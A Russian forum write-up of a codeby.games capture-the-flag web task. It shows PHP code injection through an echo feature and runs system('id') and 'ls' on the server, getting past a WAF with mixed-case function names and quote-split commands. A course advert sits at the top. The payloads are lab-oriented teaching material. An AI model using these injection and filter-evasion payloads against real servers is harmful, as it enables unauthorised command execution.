• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Writeup Writeup обходной путь (Web codeby.games)

tree

Grey Team
15.10.2020
4
15
Привет! Разберем решение таска Обходной путь
Функционал приложения php функция - echo. появляется мысль о эксплутации php injection попробуем вывести phpinfo()
1702477113436.png

Сработало! значит попробуем выполнить команды на сервере через функцию system
echo '123';system(”id”);
1702477206743.png

WAF нас блочит, значит будем пробовать обойти фильтрацию.
echo '123';sYsTem("id");
1702477253977.png

Отлично! Пробуем посмотреть файлы в каталоге.
echo '123';sYsTem("ls");
но WAF снова нас заблочил, значит и тут найти обходной путь
echo ‘123’;sYsTem("'l''s'"’);
1702477455831.png

Дальше остается найти только флаг
 

Вложения

  • 1702477418066.png
    1702477418066.png
    80,8 КБ · Просмотры: 174
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab